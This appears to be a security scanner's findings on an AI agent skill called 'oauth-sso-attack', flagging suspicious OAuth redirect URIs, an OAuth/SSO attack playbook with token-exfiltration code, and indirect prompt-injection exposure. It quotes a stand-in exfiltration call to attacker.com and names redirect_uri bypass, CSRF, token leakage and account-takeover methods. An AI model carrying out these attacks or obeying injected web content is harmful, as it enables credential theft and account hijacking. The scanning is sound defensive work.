oauth-sso-attack

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 0.90). These URLs are not direct executable downloads but are highly suspicious OAuth/redirect URIs (typosquatted subdomain, open-redirect via query and path-traversal) that can hijack authorization flows, exfiltrate tokens or redirect users to malware, so they represent a high-risk attack vector.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content is a deliberate malicious playbook: it provides step-by-step OAuth/SSO attack techniques (redirect_uri bypasses, state/nonce CSRF, token leakage, scope escalation), includes PoC code that exfiltrates authorization codes and tokens to attacker-controlled endpoints (e.g., fetch('https://attacker.com/steal?...'), DNS exfiltration), and describes full account-takeover workflows—constituting clear intent to steal credentials/tokens and enable unauthorized access.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill's SKILL.md explicitly instructs the agent to fetch and inspect public OAuth endpoints (e.g., clicking "第三方登录" and checking /.well-known/openid-configuration, /oauth/authorize, /api/auth/providers and redirect URLs) so the agent will read untrusted third-party web content whose responses directly determine follow-up exploit actions.